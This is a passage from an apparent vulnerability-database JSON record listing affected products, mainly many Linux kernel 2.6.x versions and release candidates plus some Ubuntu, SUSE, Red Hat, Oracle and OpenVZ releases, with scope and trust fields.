        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel 2.6.39-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel git2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel 2.6.36-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise high availability extension sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36.2"
      },
      {
        "model": "kernel 2.6.35-rc5-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel 2.6.38-git18",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel git4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "linux enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel 2.6.36-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.35-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel final",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.37-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "enterprise linux server eus 6.1.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel 2.6.35-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "project openvz 042stab053.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "openvz",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "project openvz 042stab057.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openvz",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel 2.6.36-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel 2.6.35-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise server for vmware sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel 2.6.33-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel 2.6.34-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel 2.6.37-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
